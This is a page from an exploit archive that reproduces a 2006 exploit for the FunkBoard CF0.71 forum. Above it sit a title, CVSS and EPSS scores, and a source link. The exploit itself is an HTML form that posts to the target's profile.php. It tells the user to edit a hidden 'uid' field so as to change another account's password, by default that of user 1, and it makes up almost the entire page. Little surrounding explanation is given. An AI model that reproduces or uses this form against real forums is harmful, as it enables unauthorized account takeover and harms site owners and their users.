Advertisement






FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit

CVE Category Price Severity
N/A CWE-434 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2006-06-15
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060071

Below is a copy:

# Title  :   FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit
# Author :   ajann

REMOTE USER PASS CHANGE EXPLOİT;

Change: <input type="hidden" name="uid" value="1"> => ID AND action

************************************************************************
***********************************************************

<form ENCTYPE="multipart/form-data" action="http://[target]/[path]/profile.php" method="POST">

<table cellspacing="1" cellpadding="2" border="0" width="100%">

<th colspan="4" bgcolor="#003366">

<b><span class="ms"><font color="#FFbb33">Profile</font></span></b>

</th>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>User Name</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

ajann  </td>

</tr> <tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>Membership Number</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

247  </td>

</tr>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>First Registered</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

Sat 03 Jun 2006 at 09:20:14 pm  </td>

</tr>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>Last Login</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

Sat 03 Jun 2006 at 09:21:45 pm  </td>

</tr>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>Number of posts</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

0  </td>

</tr>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>Status</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

Member  </td>

</tr>

<th colspan="4" bgcolor="#003366">

<b><span class="ms"><font color="#FFbb33">Entries marked with a * are required</font></span></b>

</th>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>User Name</b> <font color="#ff0000">*</font>

</td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="rname" value="ajann">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

<b>Your Name</b>  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="realname" value="ajann">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top" width="20%">

<b>Password</b> <font color="#ff0000">*</font>

</td>

<td bgcolor="#BBBBBB" colspan="3">

<input type="password" size="30" name="pass" value="8ebOZmF5pe">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

<b>Confirm Password</b> <font color="#ff0000">*</font>

</td>

<td bgcolor="#BBBBBB" colspan="3">

<input type="password" size="30" name="cpass" value="8ebOZmF5pe">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

<b>E-mail</b> <font color="#ff0000">*</font>

</td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="fmail" value="ajannhwt (at) hotmail (dot) com [email concealed]">

Hide Email Address?  <input type='radio' name='priv' value='yes'>Yes

<input type='radio' name='priv' value='no' CHECKED>No</P>

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Prefered Language  </td>

<td bgcolor="#BBBBBB" colspan="3">

<select name="newlang">

<option value='dutch.flf'>dutch</option><option value='english.flf' SELECTED>english</option>   </select>

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Homepage  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="www" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

ICQ  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="icq" value="">

</td>

<tr>

<td bgcolor="#888888" valign="top">

AOL Instant Messenger (AIM)  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="aim" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Yahoo Instant Messenger (YIM)  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="yim" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Location<font color='#ff0000'>*</font>  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="30" name="location" value="asdsadasdasd">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Hobbies/Interests  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="90" name="interebbies" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Gender (M/F)  </td>

<td bgcolor="#BBBBBB" colspan="3">

<input size="1" name="sex" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Date of Birth  </td>

<td bgcolor="#BBBBBB" colspan="3">

<select name="dobday">

<option SELECTED>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

</select>

<select name="dobmonth">

<option value="1" SELECTED >January</option>

<option value="2">February</option>

<option value="3">March</option>

<option value="4">April</option>

<option value="5">May</option>

<option value="6">June</option>

<option value="7">July</option>

<option value="8">August</option>

<option value="9">September</option>

<option value="10">October</option>

<option value="11">November</option>

<option value="12">December</option>

</select>

<input size="4"name="dobyear" value="">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Signature (< 100 characters)  </td>

<td bgcolor="#BBBBBB" colspan="3">

<textarea wrap="virtual" name="sig" rows="3" cols="35">   </textarea>

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Use an Avatar ?  </td>

<td bgcolor="#BBBBBB">

Current Avatar - <input type="hidden" name="avatar" value="No Avatar">

No Avatar   

<input type="submit" name="action" value="Select Avatar"></td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

Upload Avatar ?<br>(GIF, JPG or PNG only)  </td>

<td bgcolor="#BBBBBB">

<INPUT TYPE="FILE" NAME="userfile" SIZE="35">

<input type="hidden" name="MAX_FILE_SIZE" value="5242880">

</td>

</tr>

<tr>

<td bgcolor="#888888" valign="top">

<b>Submit</b>

</td>

<td bgcolor="#BBBBBB" colspan="3">

<input type="hidden" name="uid" value="1">

<input type="submit" name="action" value="Edit Profile">

</td>

</tr>

</form>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.